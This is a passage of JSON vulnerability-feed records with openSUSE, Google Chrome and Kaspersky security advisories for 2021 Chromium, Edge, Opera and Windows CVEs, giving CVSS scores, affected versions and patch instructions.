6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-12T20:53:16", "description": "An update that fixes 25 vulnerabilities is now available.\n\nDescription:\n\n This update for chromium fixes the following issues:\n\n - Chromium was updated to 90.0.4430.93\n (boo#1184764,boo#1185047,boo#1185398)\n * CVE-2021-21227: Insufficient data validation in V8.\n * CVE-2021-21232: Use after free in Dev Tools.\n * CVE-2021-21233: Heap buffer overflow in ANGLE.\n * CVE-2021-21228: Insufficient policy enforcement in extensions.\n * CVE-2021-21229: Incorrect security UI in downloads.\n * CVE-2021-21230: Type Confusion in V8.\n * CVE-2021-21231: Insufficient data validation in V8.\n * CVE-2021-21222: Heap buffer overflow in V8\n * CVE-2021-21223: Integer overflow in Mojo\n * CVE-2021-21224: Type Confusion in V8\n * CVE-2021-21225: Out of bounds memory access in V8\n * CVE-2021-21226: Use after free in navigation\n * CVE-2021-21201: Use after free in permissions\n * CVE-2021-21202: Use after free in extensions\n * CVE-2021-21203: Use after free in Blink\n * CVE-2021-21204: Use after free in Blink\n * CVE-2021-21205: Insufficient policy enforcement in navigation\n * CVE-2021-21221: Insufficient validation of untrusted input in Mojo\n * CVE-2021-21207: Use after free in IndexedDB\n * CVE-2021-21208: Insufficient data validation in QR scanner\n * CVE-2021-21209: Inappropriate implementation in storage\n * CVE-2021-21210: Inappropriate implementation in Network\n * CVE-2021-21211: Inappropriate implementation in Navigatio\n * CVE-2021-21212: Incorrect security UI in Network Config UI\n * CVE-2021-21213: Use after free in WebMIDI\n\n\nPatch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended installation methods\n like YaST online_update or \"zypper patch\".\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.2:\n\n zypper in -t patch openSUSE-2021-629=1", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.6, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2021-05-01T00:00:00", "type": "suse", "title": "Security update for Chromium (critical)", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21201", "CVE-2021-21202", "CVE-2021-21203", "CVE-2021-21204", "CVE-2021-21205", "CVE-2021-21207", "CVE-2021-21208", "CVE-2021-21209", "CVE-2021-21210", "CVE-2021-21211", "CVE-2021-21212", "CVE-2021-21213", "CVE-2021-21221", "CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226", "CVE-2021-21227", "CVE-2021-21228", "CVE-2021-21229", "CVE-2021-21230", "CVE-2021-21231", "CVE-2021-21232", "CVE-2021-21233"], "modified": "2021-05-01T00:00:00", "id": "OPENSUSE-SU-2021:0629-1", "href": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/NBOWNTMQCMDYBSMTERFTO5ZSZSUCY7QW/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "chrome": [{"lastseen": "2021-12-30T22:31:22", "description": "The Stable channel has been updated to 89.0.4389.128 for Windows, Mac and Linux which will roll out over the coming days/weeks.\n\n\nA full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/89.0.4389.114..89.0.4389.128?pretty=fuller&n=10000>). Interested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [2](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-4-M89>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$TBD][[1196781](<https://crbug.com/1196781>)] High CVE-2021-21206: Use after free in Blink. Reported by Anonymous on 2021-04-07\n\n[$N/A][[1196683](<https://crbug.com/1196683>)] High CVE-2021-21220: Insufficient validation of untrusted input in V8 for x86_64. Reported by Bruno Keith (@bkth_) & Niklas Baumstark (@_niklasb) of Dataflow Security (@dfsec_it) via ZDI (ZDI-CAN-13569) on 2021-04-07\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\nGoogle is aware of reports that exploits for CVE-2021-21206 and CVE-2021-21220 exist in the wild.\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\nPrudhvikumar Bommana\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-04-13T00:00:00", "id": "GCSA-3185915322248637110", "href": "https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-30T22:31:19", "description": "The Stable channel has been updated to 90.0.4430.85 for Windows, Mac and Linux which will roll out over the coming days/weeks.\n\n\nA full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/90.0.4430.72..90.0.4430.85?pretty=fuller&n=10000>). Interested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\n**Security Fixes and Rewards**\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [7](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M90>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n** \n**\n\n[$TBD][[1194046](<https://crbug.com/1194046>)] High CVE-2021-21222: Heap buffer overflow in V8. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-03-30\n\n[$TBD][[1195308](<https://crbug.com/1195308>)] High CVE-2021-21223: Integer overflow in Mojo. Reported by Guang Gong of Alpha Lab, Qihoo 360 on 2021-04-02\n\n[$TBD][[1195777](<https://crbug.com/1195777>)] High CVE-2021-21224: Type Confusion in V8. Reported by Jose Martinez (tr0y4) from VerSprite Inc. on 2021-04-05\n\n[$22000 + $22000][[1195977](<https://crbug.com/1195977>)] High CVE-2021-21225: Out of bounds memory access in V8. Reported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-05\n\n[$27000 + $27000][[1197904](<https://crbug.com/1197904>)] High CVE-2021-21226: Use after free in navigation. Reported by Brendon Tiszka (@btiszka) supporting the EFF on 2021-04-11\n\n** \n**\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel.\n\n** \n**\n\nGoogle is aware of reports that exploits for CVE-2021-21224 exist in the wild. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1200824](<https://crbug.com/1200824>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\nSrinivas Sista\n\nGoogle Chrome", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-04-20T00:00:00", "id": "GCSA-1247606144415232205", "href": "https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2021-08-18T10:56:17", "description": "### *Detect date*:\n04/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Opera. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nOpera earlier than 75.0.3969.218\n\n### *Solution*:\nUpdate to the latest version \n[Download Opera](<https://www.opera.com>)\n\n### *Original advisories*:\n[Changelog for Opera 75](<https://blogs.opera.com/desktop/changelog-for-75/#b3969.218>) \n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Opera](<https://threats.kaspersky.com/en/product/Opera/>)\n\n### *CVE-IDS*:\n[CVE-2021-21206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21206>)6.8High \n[CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-20T00:00:00", "type": "kaspersky", "title": "KLA12183 Multiple vulnerabilities in Opera", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-05-27T00:00:00", "id": "KLA12183", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12183/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T10:57:00", "description": "### *Detect date*:\n04/14/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-21206](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21206>) \n[CVE-2021-21220](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21220>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2021-21206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21206>)6.8High \n[CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-14T00:00:00", "type": "kaspersky", "title": "KLA12143 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-05-11T00:00:00", "id": "KLA12143", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12143/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T10:57:08", "description": "### *Detect date*:\n04/13/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nGoogle Chrome earlier than 89.0.4389.128\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2021-21206](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21206>)6.8High \n[CVE-2021-21220](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21220>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T00:00:00", "type": "kaspersky", "title": "KLA12136 Multiple vulnerabilities in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21206", "CVE-2021-21220"], "modified": "2021-05-11T00:00:00", "id": "KLA12136", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12136/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T10:56:56", "description": "### *Detect date*:\n04/20/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple vulnerabilities were found in Google Chrome. Malicious users can exploit these vulnerabilities to execute arbitrary code.\n\n### *Affected products*:\nGoogle Chrome earlier than 90.0.4430.85\n\n### *Solution*:\nUpdate to the latest version \n[Download Google Chrome](<https://www.google.com/chrome/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2021/04/stable-channel-update-for-desktop_20.html>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>)6.8High", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-20T00:00:00", "type": "kaspersky", "title": "KLA12147 Multiple vulnerabiltiies in Google Chrome", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-05-27T00:00:00", "id": "KLA12147", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12147/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-18T10:56:50", "description": "### *Detect date*:\n04/22/2021\n\n### *Severity*:\nWarning\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Browser. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service.\n\n### *Affected products*:\nMicrosoft Edge (Chromium-based)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-21225](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21225>) \n[CVE-2021-21222](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21222>) \n[CVE-2021-21223](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21223>) \n[CVE-2021-21224](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21224>) \n[CVE-2021-21226](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-21226>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Edge](<https://threats.kaspersky.com/en/product/Microsoft-Edge/>)\n\n### *CVE-IDS*:\n[CVE-2021-21226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21226>)6.8High \n[CVE-2021-21223](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21223>)6.8High \n[CVE-2021-21225](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21225>)6.8High \n[CVE-2021-21222](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21222>)4.3Warning \n[CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>)6.8High\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.6, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-22T00:00:00", "type": "kaspersky", "title": "KLA12153 Multiple vulnerabilities in Microsoft Browser", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21222", "CVE-2021-21223", "CVE-2021-21224", "CVE-2021-21225", "CVE-2021-21226"], "modified": "2021-05-11T00:00:00", "id": "KLA12153", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12153/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T08:21:52", "description": "### *Detect date*:\n06/08/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, execute arbitrary code, gain privileges, bypass security restrictions, cause denial of service.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server, version 2004 (Server Core installation) \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nVP9 Video Extensions \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2019 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server 2012 \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2012 (Server Core installation) \nWindows RT 8.1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2019 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2016 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for 32-bit Systems \nWindows Server 2012 R2 \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server, version 20H2 (Server Core Installation) \nWindows 8.1 for x64-based systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-31975](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31975>) \n[CVE-2021-31967](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31967>) \n[CVE-2021-31973](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31973>) \n[CVE-2021-31972](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31972>) \n[CVE-2021-33742](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33742>) \n[CVE-2021-31976](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31976>) \n[CVE-2021-31199](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31199>) \n[CVE-2021-31201](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31201>) \n[CVE-2021-31970](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31970>) \n[CVE-2021-33739](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-33739>) \n[CVE-2021-31971](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31971>) \n[CVE-2021-31951](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-31951>) \n[CVE-2021-26414](<https://api.msrc.microsoft.com/sug/v2.0/en-US/vulnerability/CVE-2021-26414>) 